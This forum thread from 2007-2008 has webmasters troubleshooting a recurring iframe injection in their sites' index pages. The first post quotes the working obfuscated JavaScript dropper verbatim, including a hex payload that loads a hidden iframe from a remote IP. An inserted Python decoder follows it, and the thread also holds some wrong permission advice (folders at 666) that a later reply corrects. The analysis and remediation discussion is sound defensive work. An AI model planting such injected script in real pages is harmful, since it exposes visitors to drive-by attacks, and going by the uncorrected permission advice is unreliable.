Digital Point Forums
#1
Dec 10th 2007, 8:14 pm
Imran
IFRAME homepage Insertion

We just had some weird script installed on the index.php file of domain.com, which has since been removed. Some details of what this is can be found at:

http://www.trendmicro.com/vinfo/viru...E%2ECW&VSect=P

The iframe that is inserted into index.php is:
Code:
<iframe src='http://url' width='1' height='1'
style='visibility: hidden;'></iframe><script>function
v475c44d384a1a(v475c44d3851e7){ function v475c44d3859b9 () {return 16;}
return(parseInt(v475c44d3851e7,v475c44d3859b9()));}function
v475c44d386957(v475c44d38712a){ var v475c44d38889a=2; var
v475c44d3878f8='';for(v475c44d3880c3=0;
v475c44d3880c3<v475c44d38712a.length; v475c44d3880c3+=v475c44d38889a){
v475c44d3878f8+=(String.fromCharCode(v475c44d384a1a(v475c44d38712a.substr(v475c44d3880c3,
v475c44d38889a))));}return v475c44d3878f8;}
document.write(v475c44d386957('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D33653131207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3237373932292B2761373532643866335C272077696474683D3438206865696768743D353739207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
The above JavaScript is encrypted code which takes you to an IP address hosted in Russia.
77.221.133.188.addr.datapoint.ru [77.221.133.188 ]
That is, datapoint.ru is the datacenter. This include has a virus in the site, which is installed in index.php. This has really been happening on many sites; every day I have to get up and change the index.php file on many sites, and I have all permissions set up fine.
The HijackThis log seems to be fine too.
I scanned my system; it looks fine.
For some information about this you can look here as well:
http://www.google.com/search?q=%3Cif...L_enIN249IN249

Can anyone provide some sort of a solution to this problem?
Thanks.
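The injected script above is a two-stage dropper: the visible part is a 1x1 invisible iframe plus a small decoder, and the long string is the second stage, encoded as two hex digits per character (the decoder hides the radix 16 behind a function that just returns 16). The following triage helper is an added example, not code from the post; it re-implements that decoder in Python, peels the document.write(hex) stage, and lists the src of every hidden iframe it finds, so the real target can be read off without ever running the script in a browser. The sample input is constructed from the snippet in the post: the hex string is copied verbatim, and the decoder's own function names are dropped since only the payload matters; the function names and regexes are this example's own.

```python
"""Added example: decode the hex-obfuscated iframe dropper quoted in post #1."""
import re

# Constructed sample: the hidden iframe and the document.write(<decoder>('<hex>'))
# call from post #1, with the decoder functions omitted. The hex string is copied
# from the post as-is.
INJECTED_SNIPPET = (
    "<iframe src='http://url' width='1' height='1' style='visibility: hidden;'>"
    "</iframe><script>document.write(v475c44d386957('"
    "3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D33653131207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3237373932292B2761373532643866335C272077696474683D3438206865696768743D353739207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E"
    "'));</script>"
)

# document.write(<name>('<hex>')) as used by the dropper
HEX_WRITE = re.compile(r"document\.write\(\w+\('([0-9A-Fa-f]+)'\)\)")
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# src may appear as src='...' in markup or as src=\'...\' inside a JS string
IFRAME_SRC = re.compile(r"""src=\\?['"]([^'"\\]+)""", re.IGNORECASE)


def decode_hex_payload(hex_text, step=2):
    """Re-implement the dropper's decoder: every `step` hex digits -> one character."""
    return "".join(chr(int(hex_text[i:i + step], 16))
                   for i in range(0, len(hex_text), step))


def is_hidden_iframe(tag):
    """1x1 or styled-invisible frames are the markers this injection uses."""
    t = tag.lower()
    tiny = re.search(r"width=['\"]?1\b", t) and re.search(r"height=['\"]?1\b", t)
    return bool(tiny) or "visibility: hidden" in t or "display: none" in t or "display:none" in t


def hidden_iframe_targets(markup):
    """src of every hidden iframe in a piece of markup or decoded JavaScript."""
    targets = []
    for tag in IFRAME_TAG.findall(markup):
        m = IFRAME_SRC.search(tag)
        if m and is_hidden_iframe(tag):
            targets.append(m.group(1))
    return targets


def analyze(markup, max_stages=5):
    """Peel document.write(hex) stages and collect hidden iframe targets from each."""
    stages, targets, current = [], [], markup
    for _ in range(max_stages):
        targets.extend(hidden_iframe_targets(current))
        m = HEX_WRITE.search(current)
        if not m:
            break
        current = decode_hex_payload(m.group(1))
        stages.append(current)
    return {"stages": stages, "hidden_iframe_targets": targets}


if __name__ == "__main__":
    report = analyze(INJECTED_SNIPPET)
    for i, stage in enumerate(report["stages"], 1):
        print("stage %d: %s" % (i, stage))
    print("hidden iframe targets:", report["hidden_iframe_targets"])
```

Running it shows that the decoded stage is itself a document.write of a second, display:none iframe whose src points at the 77.221.133.188 host named in the post, with a random query string appended so each load looks different to caches and logs; the loop in analyze() is there because droppers of this kind sometimes nest more than one hex layer.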
#2
Dec 12th 2007, 9:03 am
svsanchez
Same problem here

We are having the same problem: the code gets inserted twice a day on all index and default pages, and we have to continually remove it manually. We just banned the IP you mentioned above, but I'm not sure this is going to solve it. Maybe a tomahawk at the Russian server hosting the virus?
#3
Dec 12th 2007, 9:23 am
Imran
Hey man, after a lot of research I found the solution to this problem; since three servers were infected I had to do some research.
Your website is infected with a virus. You must have kept some folders open with 777 permissions. Please check for an index.html of about 1 KB, and also an index.php of about 1 KB, that has the virus/trojan which keeps inserting itself again and again and again.
Better delete those files and replace them with older backups.
#4
Dec 12th 2007, 10:12 pm
svsanchez
Hey Imran, thx for the tip. I found a folder with 777 permissions, so I changed it and removed the code from all index and default files. Another file that gets the code inserted is login.php; I assume that all login files, regardless of their extension, will also be affected. Hope this ends this nightmare, and really somebody should shut down that Russian server!!!
#5
Dec 12th 2007, 11:04 pm
Imran
I suggest you change your FTP/cPanel passwords, just in case.
#6
Dec 16th 2007, 1:32 am
Imran
The trojan/virus also works on home.php, default.php and index.php, and similarly on HTML and other formats.
The best bet would be to download your site, scan it with the latest Kaspersky antivirus patterns and re-upload the site. If you have a site which is very big in size, then you have a lot of work to do.

Note: this virus/trojan does not write deep inside the folders.
It just writes in the following pattern:
www/index.html
www/folder1/index.html
www/folder2/index.html
www/.../index.html

It does not write into
www/folder1/folder_inside_folder1/ << does not infect here.
Hence you would just need to download the infected files and scan them.
#7
Dec 17th 2007, 9:14 am
Imran
Just another update: cPanel has a very good solution and discussion for this.
http://forums.cpanel.net/showthread.php?t=62821
#8
Apr 4th 2008, 4:58 pm
kmofo
I'm experiencing the same problem, but I don't have access to a cPanel update. Is changing permissions on folders and replacing the infected files enough?
#9
Apr 6th 2008, 4:20 am
Imran
There are many things to be done; the basics are permissions related. Make sure you remove all infected files and change file permissions to 444 and folders to 666.
#10
Apr 8th 2008, 12:48 am
Ladadadada
Folders should be 755, not 666. 666 permissions will mean that you can't look inside the folder. You will be able to read the folder itself and write a new file inside the folder, but you won't be able to "cd" into the folder or "ls" the folder. This will probably also mean that Apache can't serve the files in those folders.

755 permissions will allow you to do everything inside the folder but everyone else will only be able to read and look inside the folder. This means that if a new file is created, you will know that whoever did it either has a way into your account or the root account. If an existing file changes in those directories then you will need to check the ownership of the file that was changed.

644 permissions for files is pretty much the same thing as 755 for directories. Only you can change the file but anyone can read it. As before, this means that if the file has changed, the attacker has either got your account or the root account.

If a file is owned by nobody or has world-writable permissions then the attacker may only have a PHP inclusion vulnerability rather than having an account on your system. This would still be bad but it's not quite as bad because the attacker would be limited in the things he could do.
#11
Apr 13th 2008, 1:25 am
kmofo
Thanks guys! Done what you suggested and now it's all ok!
#12
Apr 18th 2008, 10:09 pm
Breakaway11
I had the same problem and I did what you guys suggested!! This is such an awesome forum!

I can't believe these links were hidden in my page! SEO Black hat link building sucks!
#13
Apr 18th 2008, 10:15 pm
MoneyMoose
Thanks for the helpful info + heads-up - checked out my sites and they seem clean but you never know...
#14
Apr 19th 2008, 8:53 pm
baybossplaya
what a goldmine!
#15
Apr 22nd 2008, 11:38 pm
Imran
Glad this thread is helping so many of you.
You should always be aware of the permissions your website's folders and files have: who has permission to execute, and who has permission to read/write. This information and proper permissions will keep you safe from these IFRAME attacks.

Recently one of my clients' websites had another iframe attack, which was redirecting it to iloveads.myspace.com from the x0ss.info website. Anyone who has such an attack: look into your templates/files with 777 permissions and change them back to 444 for files to avoid any such future attacks.
#16
May 26th 2008, 6:21 am
amoona
Good post. Thank you man, it helps me a lot!
#17
Jun 18th 2008, 10:16 pm
andyoudontstop
Interesting issue. How widespread was this issue last year? I never heard of it. cPanel has been experiencing a number of vulnerabilities as of late. Check out: http://forums.digitalpoint.com/showthread.php?t=738896
#18
Nov 7th 2008, 2:23 pm
Varsys Inc.
777 permissions for files on a web server are an invitation for a hacker to alter the content of your files. Securing them is a must.
The easiest way to maintain proper permissions is to set them up on a higher-level directory and have them always inherited by subfolders and files.
Good luck!
#19
Nov 9th 2008, 12:42 am
killer2021
Interesting, I am going to look into this!
#20
Dec 22nd 2008, 6:46 am
JavaPF
This is also happening to my server and it is not due to CHMOD issues.

I have uninstalled every single script that I had running. The only thing I have left which is essential is vBulletin.

Do you other affected people also run vBulletin?

As there is nothing else left on my server but vBulletin, I'm pretty sure this is happening due to a php injection exploit. Maybe not in vBulletin itself but with one of the add-ons or modifications.

This is very interesting, although annoying!! It's obviously some sort of automated attack, as not long after removing the injected HTML, it comes back again.

Please keep this thread updated with any new information. I will be sure to post my solution when I eventually find the real security hole.
Last edited by JavaPF; Dec 22nd 2008 at 6:54 am.